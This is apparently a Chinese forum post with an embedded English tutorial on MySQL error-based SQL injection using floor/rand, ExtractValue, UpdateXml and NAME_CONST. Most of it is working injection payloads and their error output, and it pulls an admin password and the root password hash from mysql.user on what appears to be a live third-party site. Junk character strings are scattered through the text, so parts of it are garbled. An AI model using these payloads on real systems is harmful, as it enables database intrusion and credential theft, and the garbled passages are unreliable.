mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
7 R# {; w* X4 a9 ]( |: X, ~( K2 c% e首先进行正常查询：

mysql> select * from article where id = 1;
, ]% Q/ p5 @0 f/ _/ \6 u+—-+——-+———+
| id | title | content |
+—-+——-+———+
' i5 F. i3 p1 p9 A2 Q9 G|  1 | test  | do it   |
4 c  b: J8 j8 S  `: f: ~( |; o+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
1 y& y, f* O! s% T2 T2 c例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
: L9 `; y% K' S& Y2 n! {  F! G& P测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
$ [8 S+ K* Z: ?- U" ]ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

" U! Q- a' F; W/ W& r  J
" O3 _2 H) b. b* }2 l) a

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
$ s" s( |1 W1 l0 R# c! g7 e
8 q5 M9 I. ~1 OErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

* u4 e# L; R5 ?( v" e' Chttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
8 o3 R* _7 Z( `, T# ~
# w  @* U3 l# U0 Z. s! wErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

MYSQL高版本报错注入技巧-利用NAME_CONST注入
* x0 v7 q! M. W4 A. C' R- g/ O0 @It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.


相关信息

  J! ]6 u/ e, X2 k2 l( JNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
& N! l% t. M0 p/ D7 C; |% ]: y
: m5 V, |2 f+ V) t- e1 E9 t4 _Code:
NAME_CONST(DATA, VALUE)
* ^1 v5 C, A* ~
" Z" q5 z. h" a& ]( T# \Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)


) O( V. i: N6 j& b$ D
5 @( v+ X  w* [: r0 f! ~, m) o|---------------|
|     TEST      |
" O( n5 D& h/ Y7 |  Q8 t( Y" w|               |
8 ]5 x% a: Q- r|---------------|
|       1       |
0 T! u+ P& Z. S  N: t" h|               |
$ @7 A$ m+ X7 h8 q|---------------|
! R( b# [& R; O+ r, x" ~4 u( Y


6 M* G& ]% C. a
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
& u$ @$ E3 x5 }. a( Q! YIntro to MySQL Variables

Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
+ U! k# g# D4 f  W$ }- n
Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
/ A5 T& J. e. J4 N. O9 {



, J4 \8 h4 I  V: P
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
$ ^) C- I8 r( Y, `. f6 [6 }

" [9 T& C& _' P; MVAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
8 m6 g9 f4 ]4 x; }, E! E6 j: chttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

3 i1 `8 d( d6 O+ A% C+ ?" vErroruplicate column name '5.0.27-community-nt'
- ^, ]0 v. u! m2 w( s
9 b' N5 _5 e  B- X! x5 X
& j0 U$ j: M6 v0 u' p- |: S& v

) ~' L# y; Q3 C+ O- y
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
% s. M( j$ M# o' E8 c
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--


" N: O" ^. Z" @We should get a duplicate column 1 error...

. ^# G; X" x2 f( V" FCode:
5 z2 A" a, P) Thttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
/ q: g. e  T! `/ j/ ?
; y. K7 T0 B2 I/ I0 ]7 Q/ Y8 j6 QErroruplicate column name '1

; D6 ^2 }3 M  d2 c( _. f

# a2 g1 c9 F1 u

3 t# ^4 |, j# z1 j( v# q) f
Now let's get the tables out this bitch..

Code:
! c5 C- B( L: W+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

$ O. ~; L: L/ u
% v4 t' F/ Y% V9 _' W; GLet's see if it works here, if it does, we can go on and finish the job.
! }% f% _: [0 _" ?: G9 w
( M2 q& |- `& NCode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

$ F6 f* T% D4 @3 I/ s  S+ [4 p3 H
Erroruplicate column name 'com_admanage

2 ?; I( o' M3 D% w7 {1 S
5 s! e: f6 |- P! g) p( [4 }$ ~$ H

) i3 r+ ]2 B: w# M- m* t! ^: K. X) P5 Z

7 f8 o3 R5 w$ q/ c' l9 K, u7 RNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.

; N) D3 q8 D; w8 ?# D. F/ `" zLet's get the columns out of the user table..
( p4 g5 D- Q$ }# H% e1 \! t1 E  I
Code:
  d& C" h0 D. r+ {- [+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
' O" N" q/ ?2 U4 N# _$ n
- S7 O7 U8 r! ]9 M9 Z
1 r( M2 H% H7 r+ }; L8 gSo mine looks like this, and I get the duplicate column name 'Host'.

3 [. i- S5 ^8 ACode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Erroruplicate column name 'Host'
- F8 }+ k5 s7 ^/ j1 \4 ~* \: `


2 c. ~  L( z; Z3 r! `% D
1 I3 w. B! R( `3 d/ c* y+ b3 i

1 j: d: l& f/ F9 q" w. oWoot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

' p* g5 x. e$ J$ {8 {! ], h7 c( `
& z  s  l4 G* ]( F- }0 R: KSo mine looks like this...
  p- m# {8 z# \
Code:
7 h$ g9 v1 Z  z. B6 F: ghttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
; A; X( ~! |" ~2 w4 k

; Q9 B  K2 Z" _- H3 [6 Z6 m


8 M% d# `7 T. C5 [4 a- t
And there we have it, thanks for reading.

: O6 r9 n) G9 V" |0 ]